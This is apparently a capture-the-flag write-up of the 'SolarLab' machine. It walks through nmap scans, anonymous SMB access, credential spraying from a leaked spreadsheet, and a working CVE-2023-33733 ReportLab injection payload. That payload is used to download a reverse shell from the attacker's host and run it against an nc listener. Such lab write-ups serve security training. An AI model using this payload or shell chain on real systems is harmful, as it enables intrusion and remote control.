Lets begin with nmap
nmap -sC -sV -Pn 10.10.11.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 11:30 EDT
Nmap scan report for 10.10.11.16
Host is up (0.15s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-10-19T15:31:34
|_ start_date: N/A
There is an http port open, so let's check the website first.
Add solarlab.htb to /etc/hosts
echo "10.10.11.16 solarlab.htb" | sudo tee -a /etc/hosts
I found the 'get in touch' feature where we can type in input, we can see in burpsuite it's being sent to the backend
But I don't see it being reflected back anywhere,meaning we can only do blind injection, let's see if there is something easier.
Next, my second nmap finished and we get some surprising results!
first time in a while I had ctf validate my use of -p- in nmap,
I think it's great to try to have habits that check the target fully but because waiting for the full scan will be diabolical I recommend lunching your normal nmap and only then let the full one run in the background .
(you can use -T5 if you want faster results but if you don't have the best connection it might not be reliable)
nmap -Pn -T4 -p- --min-rate=500 10.10.11.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 12:59 EDT
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (1.0s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
6791/tcp open hnm
Nmap done: 1 IP address (1 host up) scanned in 251.88 seconds
Now we can check the port 6791 for more info (yes I know I could have done it in the first run but I want interested in excluding the normal ports that we checked in the first place and didn't to much time)
nmap -sC -sV -Pn -p 6791 10.10.11.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 13:05 EDT
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
6791/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
I added report.solarlab.htb to /etc/hosts
echo "10.10.11.16 report.solarlab.htb" | sudo tee -a /etc/hosts
Now go to http://report.solarlab.htb:6791/
Its asking for credentials, before attempting brute force I looked for more info
So let's check the smb
┌──(kali㉿kali)-[~]
└─$ smbclient -N -L //10.10.11.16
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.16 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~]
└─$ smbclient -N //10.10.11.16/Documents
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Fri Apr 26 10:47:14 2024
.. DR 0 Fri Apr 26 10:47:14 2024
concepts D 0 Fri Apr 26 10:41:57 2024
desktop.ini AHS 278 Fri Nov 17 05:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023
My Music DHSrn 0 Thu Nov 16 14:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023
My Videos DHSrn 0 Thu Nov 16 14:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
7779839 blocks of size 4096. 1893625 blocks available
let's search for interesting files and download them using get
And I found passwords in details-file.xlsx
It looks like the questions don't have the right answers
So I am assuming that maybe the other info might be scrambled- so let's check for each username with each password
By the length of the response we can see there are two different responses, 2419 and 2408
"User not found" and "User authentication error"
In the file that we found it looked like there might be three users
Because we get "User authentication error" for ClaudiaS and AlexanderK, we can assume we found the right usernames for two of the users and we checked all the passwords that we have,
So next I tried to guess the third username for blake.byte, it looks like every username made from first name and first letter of last name (Alexander.knight@gmail.com, knight is probably the last name -> AlexanderK)
Now I tried BlakeB with every password available
Found it
BlakeB:ThisCanB3typedeasily1@
Let's try sending a request
I got a pdf, before plying with the inputs more lets inspect the pdf
I found this vulnerability
https://github.com/c53elyas/CVE-2023-33733
Lets try it but delete 'touch' command because it's windows
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
meow
</font></para>
Even when burpsuite was used and with no interacting with the front end, the back-end still complains that i reached the character limit, I tried to shorter the variables names and delete unnecessary spaces
<font color="[[getattr(pow,W('__globals__'))['os'].system('')for W in[O('W',
(str,),{'M':1,'startswith':lambda
s,x:False, '__eq__':lambda s,x:s.m()and s.M<0 and str(s)==x,'m':lambda s:
{setattr(s,'M',s.M-1)},'__hash__':lambda s:hash(str(s))})]]for O in
[type(type(1))]]and 'red'">meow</font>
we got "meow" in red meaning it worked .
now use the system() part of the poc, probably could have just started from testing that
Because of character limitations we can't just post the whole reverse shell in 'system()' so I uploaded a file with reverse shell and then had run it, as two different http requests.
You can write or find a reverse shell, i used one in python let's call it 'p' so the commands will be as shorter as possible.
In the same place as the file I opened http service
sudo python3 -m http.server 80
Now I send post request with system('curl -o p in poc
YOUR_IP/p')
Looks like the server crushed but it still went trough yay
Now open a listener nc -lvnp 4444 and do the second step, run it with system('python p')
after getting the connection, the flag is in C:/Users/blake/Desktop/user.txt
good luck!
Top comments (0)